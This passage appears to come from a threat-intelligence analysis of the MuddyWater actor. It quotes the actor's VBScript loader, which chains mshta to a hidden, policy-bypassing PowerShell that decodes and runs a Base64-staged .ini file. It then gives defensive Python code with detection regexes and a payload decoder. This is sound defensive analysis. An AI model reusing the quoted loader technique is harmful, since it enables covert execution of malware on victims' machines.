
I know what you did last summer, MuddyWater blending in the crowd


The VBS calls powershell.exe to Base64-decode the second file and invoke it, as follows:

WScript.CreateObject("WScript.Shell").Run "mshta vbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"""",0 ""))",0

The same technique has been observed in several VBScripts in the wild that are also suspected of being used by this actor.
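The chain above (mshta started with a vbscript: URI, which spawns PowerShell, which Base64-decodes a staged .ini file and hands the result to iex) is something a defender can both spot in process-creation telemetry and unpack during triage. The Python below is an added example, not code from the report and not the actor's code. The indicator names are my own; the sample command lines and the second-stage blob are constructed here (the first command line is what the quoted VBScript passes to mshta once its doubled-quote escaping is resolved); and the decoder assumes the staged file holds a UTF-16LE script encoded as Base64, which is what the Unicode.GetString call in the quoted command implies.

```python
"""Triage helpers for the mshta -> powershell -> Base64-staged-file chain.

Added example, not from the report and not actor code. Indicator names,
sample command lines and the second-stage blob are constructed for illustration.
"""
import base64
import re

# Assumed indicator set, one pattern per link of the chain quoted in the text.
INDICATORS = {
    # mshta launched with a vbscript: URI instead of an .hta file
    "mshta_vbscript_uri": re.compile(r"\bmshta(?:\.exe)?\s+vbscript:", re.I),
    # Close(Execute("...")) wrapper that runs inline VBScript and then exits
    "execute_close_wrapper": re.compile(r"Close\s*\(\s*Execute\s*\(", re.I),
    # WScript.Shell.Run used from inside the inline script to spawn a child
    "wscript_shell_run": re.compile(r'CreateObject\(\s*"+WScript\.Shell"+\s*\)\.Run', re.I),
    "spawns_powershell": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "execution_policy_bypass": re.compile(r"-(?:exec|ex|ep|executionpolicy)\s+bypass", re.I),
    # Invoke-Expression fed directly from a Base64 decode
    "base64_to_iex": re.compile(r"\biex\s*\(.*?FromBase64String", re.I | re.S),
    # second stage read from a file on disk rather than embedded in the command
    "stages_payload_from_file": re.compile(r"\b(?:get-content|gc)\s+\S+", re.I),
}


def classify_cmdline(cmdline: str) -> list[str]:
    """Return the names of every indicator that matches one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def verdict(tags: list[str]) -> str:
    """Alert threshold used here: three or more links of the chain in one command line."""
    return "suspicious" if len(tags) >= 3 else "benign"


def decode_staged_payload(raw: bytes) -> str:
    """Unpack a staged file the way the quoted PowerShell does:
    Unicode.GetString(FromBase64String(get-content <file>)).

    .NET's FromBase64String ignores whitespace, so line-wrapped files are fine.
    "Unicode" in .NET means UTF-16LE, so the decoded bytes must have even length.
    """
    compact = "".join(raw.decode("ascii").split())
    decoded = base64.b64decode(compact, validate=True)
    if len(decoded) % 2:
        raise ValueError("odd byte count: not a UTF-16LE payload")
    return decoded.decode("utf-16-le")


def looks_like_utf16le_script(decoded: bytes) -> bool:
    """Quick triage check before decoding: ASCII text stored as UTF-16LE has
    a 0x00 high byte in every second position. Requires at least 90% NUL high bytes."""
    if len(decoded) < 2 or len(decoded) % 2:
        return False
    high = decoded[1::2]
    return high.count(0) / len(high) >= 0.9


# Constructed samples. The first is the command line the quoted VBScript hands to
# mshta (one level of VBScript "" escaping resolved); the others are benign uses
# of the same binaries and should not trip the threshold.
SAMPLE_CMDLINES = [
    r'mshta vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run""powershell.exe -w 1 '
    r'-exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString('
    r'[System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"",0 "))',
    r"mshta.exe C:\Tools\inventory.hta",
    "powershell.exe -noprofile -c Get-Process",
]

# Constructed second stage: a harmless one-liner stored the way the chain expects
# (Base64 over UTF-16LE, wrapped at 76 columns as a script-written file would be).
SAMPLE_STAGE2 = base64.encodebytes("Write-Host 'constructed second stage'".encode("utf-16-le"))


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        tags = classify_cmdline(line)
        print(f"{verdict(tags):10} {tags} <- {line[:60]}...")
    blob = base64.b64decode(SAMPLE_STAGE2)
    print("UTF-16LE script?", looks_like_utf16le_script(blob))
    print("decoded:", decode_staged_payload(SAMPLE_STAGE2))
```

The indicator set is deliberately split per link so a single-tag hit (PowerShell with -noprofile, or mshta opening a local .hta) stays below the threshold, while the full chain lights every tag; tune the threshold to the noise in your own telemetry. The decoder's even-length check matters in practice: a file that decodes to an odd byte count is not the UTF-16LE stage this chain expects, and is worth a closer look rather than a silent mis-decode.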
